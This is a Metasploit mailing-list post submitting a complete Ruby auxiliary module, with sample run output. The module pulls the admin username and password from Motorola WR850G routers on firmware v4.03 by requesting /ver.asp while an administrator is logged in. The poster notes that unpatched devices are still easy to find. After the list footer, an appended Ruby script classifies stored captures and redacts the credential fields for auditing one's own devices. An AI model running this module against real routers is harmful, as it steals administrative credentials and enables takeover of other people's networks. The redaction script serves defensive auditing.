Hey guys,
I've attached a new auxiliary module for obtaining the login credentials to a Motorola WR850G router with firmware v4.03. I just put it under admin, but there is probably a better place for it.

msf auxiliary(wr850g_cred) > run
[*] Found username "xxxx" and password "yyyy"
[*] Auxiliary module execution completed

msf > info admin/wr850g_cred

       Name: Motorola WR850G v4.03 Credentials
    Version: 1

Provided by:
  Kris Katterjohn <[EMAIL PROTECTED]>

Basic options:
  Name   Current Setting  Required  Description
  ----   ---------------  --------  -----------
  RHOST                   yes       The target address
  RPORT  80               yes       The target port

Description:
  Login credentials to the Motorola WR850G router with firmware v4.03
  can be obtained via a simple GET request if issued while the
  administrator is logged in. A lot more information is available
  through this request, but you can get it all and more after logging in.

This was disclosed back in Sep 2004, but I still easily found one lying around with this firmware.

Thanks,
Kris Katterjohn
require 'msf/core'

class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Motorola WR850G v4.03 Credentials',
      'Description'    => %q{
          Login credentials to the Motorola WR850G router with
          firmware v4.03 can be obtained via a simple GET request
          if issued while the administrator is logged in. A lot
          more information is available through this request, but
          you can get it all and more after logging in.
      },
      'Author'         => 'Kris Katterjohn <[EMAIL PROTECTED]>',
      'License'        => MSF_LICENSE,
      'Version'        => '1',
      'References'     => [
        [ 'URL', 'http://seclists.org/bugtraq/2004/Sep/0339.html']
      ],
      'DisclosureDate' => 'Sep 24 2004'))

    register_options([Opt::RPORT(80)])
  end

  def run
    # Request the version page over a raw TCP socket
    connect
    sock.put("GET /ver.asp HTTP/1.0\r\n\r\n")
    response = sock.get
    disconnect

    if response.nil? or response.empty?
      print_status("No response from server")
      return
    end

    # 302 Redirect
    if response.split(/\r\n/)[0] !~ /200 Ok/
      print_status("Administrator not logged in")
      return
    end

    # The page body carries the credentials as key=value fields ending in <br>
    user = $1 if response.match("http_username=([^\n]*)<br>")
    pass = $1 if response.match("http_passwd=([^\n]*)<br>")

    print_status("Found username \"#{user}\" and password \"#{pass}\"") if user and pass
  end
end
_______________________________________________
Framework-Hackers mailing list
Framework-Hackers@spool.metasploit.com
http://spool.metasploit.com/mailman/listinfo/framework-hackers
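
For auditing captured traffic from your own devices, the check below classifies a stored /ver.asp response and redacts the credential fields before the capture goes into a report. It is an added example, not part of the posted module or of Metasploit. The function names, the sample captures and the key=value<br> body layout (inferred from the module's two regexes) are assumptions, and it accepts any 200 status line rather than only the literal "200 Ok" the module matches.

```ruby
# Added example, not part of the posted module.
# Field names come from the module's regexes; the key=value<br> body layout
# is inferred from them and is an assumption about the real page.
SENSITIVE_KEYS = %w[http_username http_passwd].freeze

# Constructed sample captures (values are placeholders, fw_version is made up).
SAMPLE_EXPOSED = "HTTP/1.0 200 Ok\r\nContent-Type: text/html\r\n\r\n" \
  "fw_version=4.03<br>\nhttp_username=admin-user<br>\nhttp_passwd=example-secret<br>\n"
SAMPLE_REDIRECT = "HTTP/1.0 302 Redirect\r\nLocation: /\r\n\r\n"

# Classify one raw HTTP response to GET /ver.asp without returning the secrets.
def classify_ver_asp(raw)
  return { verdict: :no_response, leaked: [] } if raw.nil? || raw.empty?

  head, body = raw.split(/\r?\n\r?\n/, 2)
  code = head.to_s.lines.first.to_s.strip[%r{\AHTTP/\d\.\d\s+(\d{3})}, 1]
  return { verdict: :malformed, leaked: [] } if code.nil?
  # Anything but 200 (for example the 302 redirect) means the page was not served.
  return { verdict: :not_exposed, leaked: [] } unless code == "200"

  pairs = body.to_s.scan(/([A-Za-z0-9_]+)=([^\n<]*)<br>/i)
  leaked = pairs.select { |key, value| SENSITIVE_KEYS.include?(key) && !value.strip.empty? }
                .map(&:first).uniq
  { verdict: leaked.empty? ? :no_credentials : :credentials_exposed, leaked: leaked }
end

# Replace the values of the sensitive fields so the capture can be archived.
def redact(raw)
  raw.to_s.gsub(/\b(#{SENSITIVE_KEYS.join('|')})=[^\n<]*/) { "#{$1}=[REDACTED]" }
end

if __FILE__ == $0
  { "exposed capture" => SAMPLE_EXPOSED, "redirect capture" => SAMPLE_REDIRECT }.each do |name, raw|
    result = classify_ver_asp(raw)
    puts "#{name}: #{result[:verdict]} #{result[:leaked].inspect}"
  end
  puts redact(SAMPLE_EXPOSED)
end
```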